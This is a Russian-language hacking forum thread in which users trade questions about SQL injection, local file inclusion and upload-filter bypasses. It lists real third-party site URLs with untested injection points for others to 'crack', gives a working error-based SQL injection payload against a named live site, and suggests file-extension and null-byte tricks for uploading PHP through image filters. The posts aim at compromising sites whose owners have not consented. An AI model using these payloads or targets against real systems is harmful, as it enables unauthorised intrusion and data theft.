Ваши вопросы по уязвимостям.

2Strilo4ka дай посмотреть плз

 

двиг 102 атрибута, и второй параметр в лимите.
не скажу.

up

вот:

Showing rows 0 - 0 (1 total, Query took 0.0009 sec)

#1221 - Incorrect usage of UNION and ORDER BY

Понятно что скобки, то не поставить... Идеи?

 

странно, 1 и 3 ничего не выводит, или я что-то недопонял.

 

Часто встречал при LFI при инклюде /proc/self/status встречается 'php5-cgi', в таком случае, при доступе к /proc/self/environ не интерпритируется PHP-код (проверял много раз).

Объясните, почему?

 

2BrainDeaD, прочти сначала о blind sql injection https://forum.antichat.ru/thread35207-blind+sql+injection.html
https://forum.antichat.ru/thread18552-blind+sql+injection.html

 

спасибо. у меня ещё много недочётов в знаниях. будем исправляться.

 

Фильтрация - удаление взвешенного вещества из массы воды путем прохождения через слой пористого материала или через сетки с подходящим размером отверстий.

Грубо говоря, если мы имеем ввиду компьютерную тематику в общем, и хек тематику в частности, фильтрация - удаление символов. Меджик квотс ничего не удаляет, она экранирует

 

значит это не LFI, а fopen или file_get_contents

 

Я умею отличать LFI от остального. Я же написал!
Каждый раз, когда преписка cgi, php код не интерпритируется!

 

up..pomoqite pojalsuta

 

список не раскрученных инъекций =

http://www.sun-e-shop.co.za/?Task=CompanyInfo&CategoryID=3777'
http://www.scottishfuturestrust.org.uk/news.asp?id=1'
http://www.ncm.org.uk/news.asp?id=1'

может кто раскрутит =))...

 

показать пример где интерпритируется? Эта приписка всего лишь определяет что php работает как CGI, а не как модуль апача

Мозгом надо работать. Фильтрация - это отсеивание определенных символом, например если бы в защите использовалась функция preg(ereg)_replace и тп - это была бы фильтрация, а magic_quotes - это экранирование. Не путай термины - эту ветку читают новички, они потом и будут ходить и говорить что MQ-это фильтрация
А в этом плане я действительно больше понимаю чем ты, уж извини

 

откуда magic ON ?

а здесь к чему филтрасия ?
и вообше что здeлать тут ?

 

v1d0qz, ты просто не понимаешь семантику слова "фильтрация".
Когда говорят "фильтрация" в голове возникает образ чего-то, проходящего отбор или отсев. При фильтрации материи или сущности, этой сущности становится меньше, из нее забирают что-либо.

Magic Quotes добавляет, а не отнимает.

 

Magic_quotes - экранирование (c) capitan!
А фильтрация бывает разная, чёрная, белая, красная...

 

first sorry for my English

i don't speak Russian fluently

i was asking about

1- how to bypass php filter on uploading image is there is

any way to bypass i know the ways of live http header and tamper data and so on

what if site changes name from upload.php to 111.gif ????

is there is any way to bypass

 

_http://sng.by/articles/1.html
можно тут че заимутить? = \

 

http://sng.by/articles/439'+and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+.html

 

1111.gif.php
1111.gif%00.php - Know triggered or not

 

Помогите кто довести до ума плз)
а то я в таких скул не шарю = \ \ \ \